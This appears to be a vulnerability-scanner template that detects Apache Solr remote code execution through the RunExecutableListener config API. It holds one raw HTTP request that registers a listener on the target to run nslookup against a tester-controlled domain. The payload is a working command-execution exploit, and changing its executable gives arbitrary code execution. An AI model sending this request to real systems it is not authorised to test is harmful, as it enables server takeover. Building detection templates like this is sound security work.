id: ApacheSolr-SSRF-5

info:
  name: Apache Solr RCE
  author: 0xAwali
  severity: critical
  description: Apache Solr RCE Via RunExecutableListener , Commonly Bound Ports 8983
  reference: https://github.com/veracode-research/solr-injection
      

requests:
  - raw:
      - |
        POST /solr/db/config HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
        Accept: */*
        Accept-Encoding: gzip, deflate
        Content-Type: application/json

        {"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"nslookup","dir":"/usr/bin/","args":["{{Host}}.{{Port}}.{{Hostname}}.apachesolr.{{MY-DOMAIN}}"]}}